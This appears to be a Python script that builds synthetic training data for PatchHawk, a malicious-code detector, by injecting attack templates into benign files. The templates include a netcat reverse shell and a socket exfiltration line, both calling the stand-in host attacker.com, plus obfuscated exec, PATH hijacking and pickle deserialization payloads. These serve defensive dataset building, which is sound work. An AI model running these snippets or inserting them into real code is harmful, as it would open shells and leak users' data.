Spaces:
Running
Running
| """ | |
| Scenario generator for PatchHawk. | |
| Track A: Meta synthetic-data-kit CLI (optional, graceful fallback). | |
| Track B: Custom mutation engine that injects attack templates into benign | |
| Python files. Always produces ≥ 50 scenarios. | |
| Output: a single JSON file with fields: | |
| id, type, code_snippet, patch (or null), unit_test_code, | |
| label, source, attack_type | |
| """ | |
| import json | |
| import os | |
| import random | |
| import subprocess | |
| import tempfile | |
| import uuid | |
| from pathlib import Path | |
| # ============================================================ | |
| # Attack Templates for Mutation Engine (Track B) | |
| # ============================================================ | |
# Attack name -> template. Each template has two string fields:
#   "inject": Python source text that the mutation engine prepends to a
#             benign file to produce a malicious sample.
#   "patch":  left empty in every template below; the mutation engine uses
#             the untouched benign source as the patch instead.
ATTACK_TEMPLATES = {
    # Import of a misspelled module name.
    "typosquatting": {
        "inject": "import pythonn\n\n",
        "patch": "",
    },
    # exec() of a base64-encoded payload.
    "obfuscated_exec": {
        "inject": (
            "import base64\n"
            "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n"
        ),
        "patch": "",
    },
    # Prepends /tmp to the PATH environment variable.
    "env_hijack": {
        "inject": (
            "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n"
        ),
        "patch": "",
    },
    # Attempts to launch a netcat shell; any failure is swallowed.
    "subprocess_backdoor": {
        "inject": (
            "import subprocess\n"
            "try:\n"
            " subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\n"
            "except:\n"
            " pass\n\n"
        ),
        "patch": "",
    },
    # eval() hidden behind an innocuously named wrapper.
    "eval_hidden": {
        "inject": (
            "def safe_eval(x):\n"
            " return eval(x)\n"
            'safe_eval(\'__import__("os").system("echo 1")\')\n\n'
        ),
        "patch": "",
    },
    # pickle.loads() on a hand-written pickle byte string.
    "pickle_deserialization": {
        "inject": (
            "import pickle\n"
            "pickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n"
        ),
        "patch": "",
    },
    # Opens a socket to a remote host and sends bytes; failures are swallowed.
    "socket_exfil": {
        "inject": (
            "import socket\n"
            "try:\n"
            " s = socket.socket()\n"
            " s.connect(('attacker.com', 80))\n"
            " s.sendall(b'exfiltrated data')\n"
            "except:\n"
            " pass\n\n"
        ),
        "patch": "",
    },
    # Shell command executed through a dynamic __import__ call.
    "malicious_import": {
        "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
        "patch": "",
    },
}
| # ============================================================ | |
| # Benign file loader | |
| # ============================================================ | |
def load_benign_files(benign_dir: str) -> list:
    """Read every ``.py`` file located directly inside *benign_dir*.

    Args:
        benign_dir: Path of the directory holding benign Python sources.

    Returns:
        A list of ``{"filename": <name>, "code": <file text>}`` dicts ordered
        by filename. The list is empty when *benign_dir* is missing or is not
        a directory.
    """
    # isdir (not exists) so that a plain-file path does not reach os.listdir.
    if not os.path.isdir(benign_dir):
        return []

    files_data = []
    for filename in sorted(os.listdir(benign_dir)):
        path = os.path.join(benign_dir, filename)
        # Skip non-Python entries and directories that merely end in ".py".
        if not filename.endswith(".py") or not os.path.isfile(path):
            continue
        # Explicit UTF-8 keeps decoding independent of the platform locale.
        with open(path, encoding="utf-8") as fh:
            files_data.append({"filename": filename, "code": fh.read()})
    return files_data
| # ============================================================ | |
| # Auto-generated lightweight unit tests | |
| # ============================================================ | |
def auto_generate_unit_test(filename: str, code: str) -> str:
    """Build a tiny test script for a benign module.

    The script imports the module under the name ``code`` and adds one
    assertion chosen by the first known function name found as a substring
    of *code*. When none matches, a trivial always-true assertion is used.

    Args:
        filename: Name of the benign file (not used when picking the check).
        code: Source text of the benign module.

    Returns:
        The test script as a string.
    """
    # Ordered: the first marker found in the source wins.
    known_checks = (
        ("fibonacci", "assert code.fibonacci(5) == 5\n"),
        ("factorial", "assert code.factorial(5) == 120\n"),
        ("is_prime", "assert code.is_prime(7) == True\n"),
        ("gcd", "assert code.gcd(48, 18) == 6\n"),
        ("is_palindrome", "assert code.is_palindrome('racecar') == True\n"),
        ("celsius_to_fahrenheit", "assert code.celsius_to_fahrenheit(0) == 32\n"),
    )
    assertion = next(
        (check for marker, check in known_checks if marker in code),
        "assert True # module loaded successfully\n",
    )
    return "import code\n" + assertion
| # ============================================================ | |
| # Track B – custom mutation engine (always available) | |
| # ============================================================ | |
def _mutation_scenario(
    prefix, scenario_type, code_snippet, patch, unit_test_code, label, attack_type
):
    """Assemble one mutation-engine scenario record with a fresh random id."""
    return {
        "id": f"{prefix}_{uuid.uuid4().hex[:8]}",
        "type": scenario_type,
        "code_snippet": code_snippet,
        "patch": patch,
        "unit_test_code": unit_test_code,
        "label": label,
        "source": "mutation_engine",
        "attack_type": attack_type,
    }


def generate_track_b_scenarios(benign_files: list, num_samples: int = 55) -> list:
    """Generate mutation-engine scenarios in fixed proportions of *num_samples*.

    The split is 45% true positives (an attack template prepended to a benign
    file), 27% false positives (a suspicious-looking but harmless snippet
    prepended to a benign file), and the remainder functional samples
    (unmodified benign files).

    Args:
        benign_files: Dicts with ``"filename"`` and ``"code"`` keys.
        num_samples: Total number of scenarios to produce.

    Returns:
        A list of scenario dicts, grouped in the order true positives, false
        positives, functional. Empty when *benign_files* is empty or
        *num_samples* is not positive.
    """
    # random.choice raises IndexError on an empty sequence, so bail out early.
    if not benign_files or num_samples <= 0:
        return []

    tp_count = int(num_samples * 0.45)
    fp_count = int(num_samples * 0.27)
    # The remainder absorbs the rounding loss of the two int() truncations.
    fn_count = num_samples - tp_count - fp_count

    # Benign snippets that superficially resemble the attack templates.
    fp_templates = [
        (
            "fp_eval",
            "def safe_calc(expr):\n"
            " # Legit eval in controlled env\n"
            " return eval(expr, {'__builtins__': {}}, {})\n\n",
        ),
        (
            "fp_requests",
            "import requests\n"
            "# Just checking internet\n"
            "try:\n"
            " requests.get('https://8.8.8.8', timeout=1)\n"
            "except:\n"
            " pass\n\n",
        ),
        (
            "fp_os_environ",
            "import os\n"
            "# Setup proxy\n"
            "os.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n",
        ),
        (
            "fp_base64",
            "import base64\n"
            "def encode_msg(msg):\n"
            " return base64.b64encode(msg.encode())\n\n",
        ),
        (
            "fp_subprocess_legit",
            "import subprocess\n"
            "# Run a safe command for build process\n"
            "result = subprocess.run(['echo', 'build ok'], capture_output=True)\n\n",
        ),
    ]
    # Materialised once; the template table does not change while we loop.
    attack_items = list(ATTACK_TEMPLATES.items())

    scenarios = []

    # ── True positives (45%) ──────────────────────────────────
    for _ in range(tp_count):
        bf = random.choice(benign_files)
        attack_name, attack_data = random.choice(attack_items)
        scenarios.append(
            _mutation_scenario(
                "tp",
                "true_positive",
                attack_data["inject"] + bf["code"],
                bf["code"],  # the clean original serves as the patch
                auto_generate_unit_test(bf["filename"], bf["code"]),
                "malicious",
                attack_name,
            )
        )

    # ── False positives (27%) ─────────────────────────────────
    for _ in range(fp_count):
        bf = random.choice(benign_files)
        _fp_name, fp_code = random.choice(fp_templates)
        scenarios.append(
            _mutation_scenario(
                "fp",
                "false_positive",
                fp_code + bf["code"],
                None,
                auto_generate_unit_test(bf["filename"], bf["code"]),
                "benign",
                None,
            )
        )

    # ── Functional / clean (remainder) ────────────────────────
    for _ in range(fn_count):
        bf = random.choice(benign_files)
        scenarios.append(
            _mutation_scenario(
                "fn",
                "functional",
                bf["code"],
                None,
                auto_generate_unit_test(bf["filename"], bf["code"]),
                "benign",
                None,
            )
        )

    return scenarios
| # ============================================================ | |
| # Track A – Meta synthetic-data-kit (optional) | |
| # ============================================================ | |
def _sdk_item_to_scenario(item):
    """Convert one SDK output record into a scenario dict, or None if unusable."""
    if not isinstance(item, dict):
        return None
    snippet = item.get("code_snippet") or item.get("code")
    if not snippet:
        return None
    patch = item.get("patch")
    # A record that carries a patch is treated as a malicious sample.
    has_patch = bool(patch)
    return {
        "id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
        "type": "true_positive" if has_patch else "functional",
        "code_snippet": snippet,
        "patch": patch,
        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
        "label": "malicious" if has_patch else "benign",
        "source": "synthetic_data_kit",
        "attack_type": item.get("attack_type", "llm_generated"),
    }


def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10) -> list:
    """
    Track A: run the ``synthetic-data-kit`` CLI pipeline (ingest -> create ->
    curate -> save-as) in a temporary workspace and convert its JSON output
    into scenario dicts.

    Falls back gracefully: returns an empty list when the CLI is unavailable,
    when ``sdk_config.yaml`` is missing next to this file, or when a pipeline
    step fails or times out.

    Args:
        output_dir: Accepted for interface compatibility; not used here.
        num_samples: Accepted for interface compatibility; not used here.

    Returns:
        A list of scenario dicts with ``source == "synthetic_data_kit"``.
    """
    sdk_scenarios: list = []
    cli = "synthetic-data-kit"

    # Probe the CLI. OSError also covers "found but not executable".
    try:
        subprocess.run([cli, "--help"], capture_output=True, check=True)
    except (subprocess.SubprocessError, OSError):
        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
        return sdk_scenarios

    here = Path(__file__).parent
    config_path = here / "sdk_config.yaml"
    if not config_path.exists():
        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
        return sdk_scenarios

    with tempfile.TemporaryDirectory() as tmpdir:
        workspace = Path(tmpdir) / "sdk_workspace"
        workspace.mkdir()
        ingested = workspace / "ingested"
        created = workspace / "created"
        curated = workspace / "curated"
        output_json = workspace / "final_sdk.json"

        # (command, timeout in seconds or None) executed in order.
        steps = []
        benign_dir = here / "benign"
        if benign_dir.exists():
            steps.append(
                ([cli, "ingest", str(benign_dir), "--output", str(ingested)], None)
            )
        steps.append(
            (
                [
                    cli,
                    "create",
                    str(ingested),
                    "--type",
                    "qa",
                    "-c",
                    str(config_path),
                    "--output",
                    str(created),
                ],
                600,  # only the generation step is time-limited
            )
        )
        steps.append(([cli, "curate", str(created), "--output", str(curated)], None))
        steps.append(
            (
                [
                    cli,
                    "save-as",
                    str(curated),
                    "--format",
                    "json",
                    "--output",
                    str(output_json),
                ],
                None,
            )
        )

        try:
            for command, timeout in steps:
                subprocess.run(
                    command, check=True, capture_output=True, timeout=timeout
                )
        except subprocess.TimeoutExpired:
            print("⚠️ SDK generation timed out.")
            return sdk_scenarios
        except subprocess.CalledProcessError as e:
            # errors="replace" so undecodable stderr cannot raise here.
            msg = e.stderr.decode(errors="replace") if e.stderr else "Unknown error"
            print(f"⚠️ SDK command failed: {msg}")
            return sdk_scenarios

        if not output_json.exists():
            return sdk_scenarios

        # An unreadable or malformed result disables Track A instead of crashing.
        try:
            with open(output_json, encoding="utf-8") as fh:
                data = json.load(fh)
        except (OSError, ValueError) as e:
            print(f"⚠️ Could not read SDK output: {e}")
            return sdk_scenarios

        if not isinstance(data, list):
            print("⚠️ Unexpected SDK output format (expected a JSON list).")
            return sdk_scenarios

        for item in data:
            scenario = _sdk_item_to_scenario(item)
            if scenario is not None:
                sdk_scenarios.append(scenario)

    return sdk_scenarios
| # ============================================================ | |
| # Track HF – Hugging Face dataset loader (optional) | |
| # ============================================================ | |
def _select_hf_split(ds, split):
    """Reduce a DatasetDict to one split; return any other object unchanged."""
    from datasets import DatasetDict

    if not isinstance(ds, DatasetDict):
        return ds
    if split in ds:
        return ds[split]
    # Requested split is absent: fall back to the first available one.
    return next(iter(ds.values()))


def _hf_item_to_scenario(item, text_field, only_python):
    """Convert one dataset row into a scenario dict, or None to skip the row."""
    default_test = "import code\nassert True"
    malicious_labels = ("malicious", "vuln", "vulnerable")

    if isinstance(item, dict):
        if only_python:
            lang = (item.get("lang") or item.get("language") or "").lower()
            # Rows without any language tag are kept; only mismatches drop.
            if lang and lang != "python":
                return None
        code = None
        # Prefer an accepted/chosen field when present, then the caller's field.
        for key in ("chosen", text_field, "code", "snippet", "text"):
            value = item.get(key)
            if isinstance(value, str) and value.strip():
                code = value
                break
        # `or` also replaces an explicit null stored in the dataset.
        unit_test = item.get("unit_test_code") or default_test
        label = item.get("label") or item.get("classification") or "benign"
        patch = item.get("patch")
        attack_type = item.get("vulnerability") or item.get("attack_type")
    else:
        # Plain examples (no fields).
        code = str(item)
        unit_test = default_test
        label = "benign"
        patch = None
        attack_type = None

    if not code:
        return None

    is_malicious = bool(patch) or (
        isinstance(label, str) and label.lower() in malicious_labels
    )
    return {
        "id": f"hf_{uuid.uuid4().hex[:8]}",
        "type": "true_positive" if is_malicious else "functional",
        "code_snippet": code,
        "patch": patch,
        "unit_test_code": unit_test,
        "label": "malicious" if is_malicious else "benign",
        "source": "huggingface_dataset",
        "attack_type": attack_type,
    }


def generate_track_hf_scenarios(
    hf_dataset_id: str,
    split: str = "train",
    text_field: str = "code",
    num_samples: int = 0,
    only_python: bool = False,
) -> list:
    """
    Load snippets from a Hugging Face dataset and return scenario dicts.

    - `hf_dataset_id`: a dataset id on the Hub (e.g. "username/repo"), or a
      local path: a `save_to_disk` directory, a directory of `*.jsonl` files,
      a `.json`/`.jsonl`/`.ndjson` file, or a plain text file with one
      example per line
    - `split`: split to read; when a local source exposes several splits and
      this one is absent, the first available split is used
    - `text_field`: field name in dataset containing the code/snippet
    - `num_samples`: 0 => load entire split, otherwise limit
    - `only_python`: drop rows whose `lang`/`language` field is set to
      something other than "python"

    Returns an empty list (after printing a warning) when the `datasets`
    package is missing or the dataset cannot be loaded.
    """
    hf_scenarios: list = []
    try:
        from datasets import load_dataset
    except Exception as e:
        print(f"⚠️ Install `datasets` (pip install datasets). Error: {e}")
        return hf_scenarios

    try:
        local_path = Path(hf_dataset_id)
        if not local_path.exists():
            ds = load_dataset(hf_dataset_id, split=split)
        elif local_path.is_dir():
            try:
                # Directory written by `save_to_disk`.
                from datasets import load_from_disk

                ds = load_from_disk(str(local_path))
            except Exception:
                # Fall back to loading as files inside the dir.
                ds = load_dataset("json", data_files=str(local_path / "*.jsonl"))
        elif local_path.suffix.lower() in (".jsonl", ".json", ".ndjson"):
            ds = load_dataset("json", data_files=str(local_path))
        else:
            # Treat as plain text file, one example per line.
            with open(local_path, "r", encoding="utf-8") as fh:
                lines = [line.rstrip("\n") for line in fh if line.strip()]
            from datasets import Dataset

            ds = Dataset.from_dict({"text": lines})
        # Local loaders may hand back a mapping of splits; iterating that
        # would yield split names rather than rows.
        ds = _select_hf_split(ds, split)
    except Exception as e:
        print(f"⚠️ Could not load HF dataset {hf_dataset_id}: {e}")
        return hf_scenarios

    if num_samples and num_samples > 0:
        try:
            ds = ds.select(range(min(num_samples, len(ds))))
        except Exception:
            # Objects without len()/select(): cap lazily while iterating.
            import itertools

            ds = itertools.islice(ds, num_samples)

    for item in ds:
        scenario = _hf_item_to_scenario(item, text_field, only_python)
        if scenario is not None:
            hf_scenarios.append(scenario)
    return hf_scenarios
| # ============================================================ | |
| # CLI entry point | |
| # ============================================================ | |
def main():
    """Command-line entry point: build scenarios and write them to one JSON file.

    Track B (mutation engine) always runs. Track A (synthetic-data-kit) runs
    with ``--use-sdk`` and the Hugging Face track runs when ``--hf-dataset``
    is given. The combined scenarios are shuffled, written to ``--output``,
    and a per-label summary is printed. Exits early, writing nothing, when
    the benign directory yields no files.
    """
    import argparse

    parser = argparse.ArgumentParser(description="Generate scenarios for PatchHawk")
    parser.add_argument(
        "--benign-dir",
        type=str,
        default="patchhawk/data/benign/",
    )
    parser.add_argument(
        "--output",
        type=str,
        default="patchhawk/data/scenarios.json",
    )
    parser.add_argument(
        "--num-samples",
        type=int,
        default=55,
        help="Number of scenarios to generate with Track B (mutation engine).",
    )
    parser.add_argument(
        "--use-sdk",
        action="store_true",
        help="Use Meta synthetic-data-kit (requires CLI + vLLM)",
    )
    parser.add_argument(
        "--sdk-samples",
        type=int,
        default=10,
        help="Number of SDK samples to generate",
    )
    parser.add_argument(
        "--hf-dataset",
        type=str,
        default=None,
        help="HuggingFace dataset id (e.g., username/repo) to import snippets from",
    )
    parser.add_argument(
        "--hf-split",
        type=str,
        default="train",
        help="Split name to load from the HF dataset",
    )
    parser.add_argument(
        "--hf-field",
        type=str,
        default="code",
        help="Field name in HF dataset that contains the code/snippet",
    )
    parser.add_argument(
        "--hf-samples",
        type=int,
        default=0,
        help="Number of HF samples to use (0 = all)",
    )
    parser.add_argument(
        "--hf-only-python",
        action="store_true",
        default=False,
        help="If set, only include HF examples where language/lang == python",
    )
    args = parser.parse_args()

    benign_files = load_benign_files(args.benign_dir)
    if not benign_files:
        print(f"No benign files found in {args.benign_dir}. Create some first.")
        return

    output_dir = os.path.dirname(args.output)

    # Track B (always)
    scenarios = generate_track_b_scenarios(benign_files, args.num_samples)

    # Track A (optional)
    if args.use_sdk:
        sdk = generate_track_a_scenarios_with_sdk(output_dir, args.sdk_samples)
        scenarios.extend(sdk)
        if sdk:
            print(f"Added {len(sdk)} SDK-generated scenarios.")

    # Track HF (optional)
    if args.hf_dataset:
        hf = generate_track_hf_scenarios(
            args.hf_dataset,
            args.hf_split,
            args.hf_field,
            args.hf_samples,
            args.hf_only_python,
        )
        scenarios.extend(hf)
        if hf:
            print(f"Added {len(hf)} HuggingFace scenarios.")

    random.shuffle(scenarios)

    # A bare filename has an empty dirname, and os.makedirs("") raises.
    if output_dir:
        os.makedirs(output_dir, exist_ok=True)
    with open(args.output, "w", encoding="utf-8") as fh:
        json.dump(scenarios, fh, indent=2)

    tp = sum(1 for s in scenarios if s["label"] == "malicious")
    bn = sum(1 for s in scenarios if s["label"] == "benign")
    print(f"✅ Total scenarios: {len(scenarios)}")
    print(f" Malicious (TP): {tp}")
    print(f" Benign (FP+fn): {bn}")
    print(f" Saved to {args.output}")


if __name__ == "__main__":
    main()